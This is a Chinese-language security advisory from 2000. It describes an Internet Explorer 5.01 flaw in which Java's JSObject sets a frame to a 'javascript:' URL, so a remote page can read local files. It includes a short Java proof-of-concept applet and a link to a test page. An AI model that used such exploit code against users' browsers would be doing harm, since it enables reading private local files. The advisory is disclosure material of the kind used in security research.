发布日期：2000-04-21
更新日期：2000-04-21

受影响系统：

Microsoft Internet Explorer 5.01
              + Microsoft Windows 98
              + Microsoft Windows 95
              + Microsoft Windows NT 4.0
              + Microsoft Windows NT 2000

描述：

---

    这是IE执行java的漏洞。通常IE5.x不容许对本地执行"javascript:" 的URL，但通过java和JavaScript的文件目标模块(Document ObjectModel)的交互作用可以绕过限制。java的JSObject容许设置DOM和设置危险的javascript url。远端浏览器就可以执行javascript来读本地文件。
     

<*

漏洞发现者以及相关联结:Georgi Guninski <joro@nat.bg>

http://www.securityfocus.com/templates/archive.pike?list=1&msg=38FC6130.D6D178FD@nat.bg

*>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.nat.bg/~joro/jsinject.html


import java.applet.Applet;
import netscape.javascript.*;

public class jsinject extends Applet {

public void doit()
{
  try
   {
    JSObject win = (JSObject) JSObject.getWindow(this);  
    JSObject doc = (JSObject) win.getMember("document");
    JSObject I1 =  (JSObject) doc.getMember("I1");
    JSObject loc = (JSObject) I1.getMember("location");
    loc.setMember("href",getParameter("jscode"));
   }
    catch(Exception x){System.out.println(x.toString());}
}
}



建议：

---

    暂无。



浏览次数：6315
严重程度：0（网友投票）